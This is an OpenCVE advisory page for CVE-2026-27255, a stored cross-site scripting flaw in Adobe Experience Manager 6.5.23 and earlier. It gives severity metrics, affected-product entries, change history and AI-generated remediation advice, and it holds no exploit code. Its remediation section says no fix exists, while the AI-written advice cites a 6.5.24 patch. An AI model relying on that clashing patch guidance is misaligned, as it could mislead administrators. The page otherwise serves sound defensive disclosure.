Description
Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Published: 2026-03-11
Score: 5.4 Medium
EPSS: < 1% Very Low
KEV: No
Impact: Stored Cross-Site Scripting
Action: Immediate Patch
AI Analysis

Impact

The vulnerability is a stored XSS in Adobe Experience Manager 6.5.23 and earlier, allowing a low‑privileged attacker to inject malicious JavaScript into form fields that are stored and later rendered to other users. When affected users view the page, the malicious script runs in their browser, compromising their session or data. This CWE‑79 weakness permits execution of code in the victim's context but does not provide direct system compromise.

Affected Systems

Affected products are Adobe Experience Manager, version 6.5.23 and all earlier releases. The vulnerability impacts the specified product across both on‑premises and cloud deployments as indicated by the cpe entries.

Risk and Exploitability

The CVSS score of 5.4 indicates medium severity, and the EPSS score of less than 1% suggests a low probability of exploitation. The vulnerability is not listed in CISA's KEV catalog. Exploitation requires an attacker to create or edit a form field with malicious JavaScript; no special privileges beyond a low‑privileged user are needed. The attack vector is user‑generated content displayed to other users, making it a potential threat to any staff or customers interacting with the affected forms.

Generated by OpenCVE AI on March 17, 2026 at 15:34 UTC.

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

  • Apply the latest Adobe Experience Manager patch (e.g., 6.5.24 or later).
  • If patching is not possible immediately, restrict or remove access to form fields that are vulnerable until a patch can be applied.
  • Verify that any input is properly escaped or sanitized before rendering to users.

Generated by OpenCVE AI on March 17, 2026 at 15:34 UTC.

Tracking

Sign in to view the affected projects.

Advisories

No advisories yet.

History

Wed, 11 Mar 2026 14:30:00 +0000

Type Values Removed Values Added
First Time appeared Adobe experience Manager
CPEs cpe:2.3:a:adobe:experience_manager:*:*:*:*:-:*:*:*
cpe:2.3:a:adobe:experience_manager:*:*:*:*:aem_cloud_service:*:*:*
cpe:2.3:a:adobe:experience_manager:6.5:-:*:*:lts:*:*:*
cpe:2.3:a:adobe:experience_manager:6.5:sp1:*:*:lts:*:*:*
Vendors & Products Adobe experience Manager

Wed, 11 Mar 2026 14:15:00 +0000

Type Values Removed Values Added
Metrics ssvc

{'options': {'Automatable': 'no', 'Exploitation': 'none', 'Technical Impact': 'partial'}, 'version': '2.0.3'}

Wed, 11 Mar 2026 12:00:00 +0000

Type Values Removed Values Added
First Time appeared Adobe
Adobe adobe Experience Manager
Vendors & Products Adobe
Adobe adobe Experience Manager

Wed, 11 Mar 2026 01:00:00 +0000

Type Values Removed Values Added
Description Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Title Adobe Experience Manager | Cross-site Scripting (Stored XSS) (CWE-79)
Weaknesses CWE-79
References
Metrics cvssV3_1

{'score': 5.4, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N'}

Subscriptions

Adobe Adobe Experience Manager Experience Manager
cve-icon MITRE

Status: PUBLISHED

Assigner: adobe

Published:

Updated: 2026-03-11T13:38:38.325Z

Reserved: 2026-02-18T22:02:41.385Z

Link: CVE-2026-27255

cve-icon Vulnrichment

Updated: 2026-03-11T13:28:58.507Z

cve-icon NVD

Status : Analyzed

Published: 2026-03-11T01:16:56.077

Modified: 2026-04-06T14:19:05.733

Link: CVE-2026-27255

cve-icon Redhat

No data.

cve-icon OpenCVE Enrichment

Updated: 2026-03-20T14:38:25Z

Weaknesses